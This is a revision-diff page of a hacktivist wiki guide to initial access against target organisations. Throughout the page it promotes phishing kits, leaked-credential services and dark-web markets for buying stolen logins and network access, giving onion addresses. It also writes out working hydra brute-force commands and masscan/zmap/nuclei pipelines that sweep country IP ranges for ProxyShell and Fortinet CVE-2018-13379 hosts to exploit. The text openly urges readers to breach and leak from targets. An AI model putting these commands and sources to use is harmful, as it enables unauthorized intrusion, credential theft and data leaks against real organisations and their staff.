Initial Access Tactics, techniques and procedures: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
 
(104 intermediate revisions by 3 users not shown)
Line 1: Line 1:
== Phishing ==
== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious email attachment or click on a malicious link. As hacktivists we want to find away to gain entry inside the targets network as quickly and easily as possible to leak documents, expose lies and corruption and free the truth!
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.


==== Tools ====
==== Tools ====
Line 18: Line 18:
* https://github.com/edoverflow/can-i-take-over-xyz
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office


== Password Attacks ==
== Password Attacks ==
Line 24: Line 26:
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.


=== Username creation based on recon/osint ===
=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.
 
* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/digininja/RSMangler
Line 31: Line 36:
* https://github.com/vysecurity/LinkedInt
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/initstring/linkedin2username
* https://bitbucket.org/grimhacker/office365userenum/src/master
* https://github.com/shroudri/username_generator
* https://github.com/shroudri/username_generator
* https://github.com/digininja/CeWL


=== Passwords ===
=== Passwords ===
Common and leaked credentials to test login portals and network services.
==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet
==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/ihebski/DefaultCreds-cheat-sheet
* https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists


=== Password cracking tools ===
=== Password cracking tools ===
* https://www.kali.org/tools/ncrack
 
* https://www.kali.org/tools/wfuzz
* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://www.kali.org/tools/patator
* https://www.kali.org/tools/hydra
* https://github.com/1N3/BruteX
A basic example using a wordlist in the format of email:pass/user:pass. <code>hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S</code>
* https://www.kali.org/tools/brutespray


=== Searching leaks ===
=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]
* https://github.com/khast3x/h8mail [Free but includes paid services]


=== Services ===
==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.


* https://haveibeenpwned.com
* https://haveibeenpwned.com
* https://exposed.lol
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]


Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, email:pass.
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.
 
=== Buying access ===
'''[https://www.nationalcrimeagency.gov.uk/news/notorious-criminal-marketplace-selling-victim-identities-taken-down-in-international-operation WARNING!] The genesis market has been seized by the authorities. They do operate a v3 Tor onion address however it's unclear whether or not the feds have back-end access to the market so for safety we won't list it here. [https://archive.ph/BcFgs Genesis admin response.]'''
 
You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.
* https://genesis.market/guest/login/index [Paid]
 
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
 
* https://xss.is
* https://exploit.in [Free & Paid]


=== Password spraying ===
=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.
* https://github.com/dafthack/MSOLSpray
* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
Line 79: Line 87:
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper
* https://github.com/dafthack/MailSniper
* <code>hydra -L usernames.txt -p Spring2023 10.10.10.13 rdp</code>


=== Hash cracking ===
=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!
==== Identify hash ====
* https://github.com/blackploit/hash-identifier
==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net
* https://crackstation.net
==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules


== Targeted spray and pray ==
== Buying access ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or our target companies IP ranges for critical vulnerabilities and grep out targeted domains. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using <code>nmap -Pn -sS -R -iL targets.txt -oA results</code>, however this is also done by default when performing a vulnerability scan using NSE.


==== Tools ====
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* https://www.kali.org/tools/masscan
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]
Scan IP ranges, output only ipv4 addresses and block known honeypots:
 
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 5000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
 
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])
* https://ramp4u.io [Free & Paid] ([http://rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd.onion Tor])
 
== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.
 
=== Prerequisites ===
There are some prerequisites you will need to follow the below examples:
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].


Add the port numbers to the end of discovered IPs in the format: ip-address:443
=== Networks ===
==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.


<code>sed -i 's/$/:443/' results.txt</code>
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.


[https://www.bleepingcomputer.com/news/security/researchers-compile-list-of-vulnerabilities-abused-by-ransomware-gangs Vuln] scan IPs:
'''IP Ranges''':
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0


<code>nuclei -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2021/CVE-2021-34473.yaml nuclei-templates/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>
===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]


Scan for multiple different ports:
'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>


<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 5000 -p4443,4455,10443,8443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>sed -i 's/$/:443/' results.txt</code>


Add unique port numbers to the end of discovered IPs in the format: ip-address:port
*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>


<code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
Exploit Discovered hosts: [[Proxyshell]]


[https://www.bleepingcomputer.com/news/security/researchers-compile-list-of-vulnerabilities-abused-by-ransomware-gangs Vuln] scan IPs:
===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]


<code>nuclei -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2018/CVE-2018-13379.yaml nuclei-templates/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
'''Tool''': [https://github.com/zmap/zmap zmap]


* https://github.com/zmap/zmap
'''1.''' Scan for Microsoft Exchange E-mail Servers:
[https://enlacehacktivista.org/hackback2.webm Guacamaya] scanning for proxyshell using zmap and [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]:  
<pre>
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
<pre>
nmap -p 443 -Pn -n \
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>
</pre>
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]
===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.
See [[Domain Spray and Pray]] scanning.
==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.
===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
<br>
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>
===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
<br>
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

Latest revision as of 12:22, 30 March 2024

Phishing

Phishing is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

Tools

Password Attacks

Groups like Lapsus$ show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of Uber, Rockstar games, Okta and so on then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either social engineering or MFA fatigue.

Usernames

Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.

Passwords

Common and leaked credentials to test login portals and network services.

Default passwords

Common and leaked passwords

Password cracking tools

Searching leaks

Services

Please note: DO NOT use intelx[.]io as they have been seen doxing hackers in the past and block the use of Tor. AVOID!

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

Once your leaks have been downloaded you can parse your results in the format, e-mail:pass.

Password spraying

Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords (Spring2023) and spray them hoping an employee uses a weak and guessable credential.

Hash cracking

Crack password hashes using both online and offline tools!

Identify hash

Online tools

Offline tools

Buying access

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

Spray and pray

As seen by Guacamaya, hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See scanning and recon for tools such as nuclei and the nmap scripting engine (NSE) to then vulnerability scan the IP addresses you discover.

Prerequisites

There are some prerequisites you will need to follow the below examples:

  1. Virtual or Dedicated server (OPSEC)
  2. Basic command line knowledge
  3. Terminal multiplexers such as Tmux or Gnu/Screen to maintain your scanning and hacking session
  4. Administration skills such as SSH and SCP.

Networks

Vulnerability Scanning

We can use a vulnerability scanning spray and pray technique on publicly facing applications to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on new and old CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

IP Ranges:

Proxyshell

Tool: masscan

1. Scan for Proxyshell:

  • sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
  • sed -i 's/$/:443/' results.txt

Exploit Discovered hosts: Proxyshell

CVE-2018-13379

2. Scan for CVE-2018-13379:

Exploit Discovered hosts: Fortinet SSL VPN Path Traversal

Tool: zmap

1. Scan for Microsoft Exchange E-mail Servers: 

sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt

2. Vulnerability scan discovered hosts for Proxyshell using NSE 

nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt

Exploit Discovered hosts

Domains

Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See Domain Spray and Pray scanning.

Password Attacks

A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

RDP

1. Remote Desktop (RDP) Brute forcing:

VPN

2. Virtual Private Network (VPN) Brute forcing:

Retrieved from "https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&oldid=1732"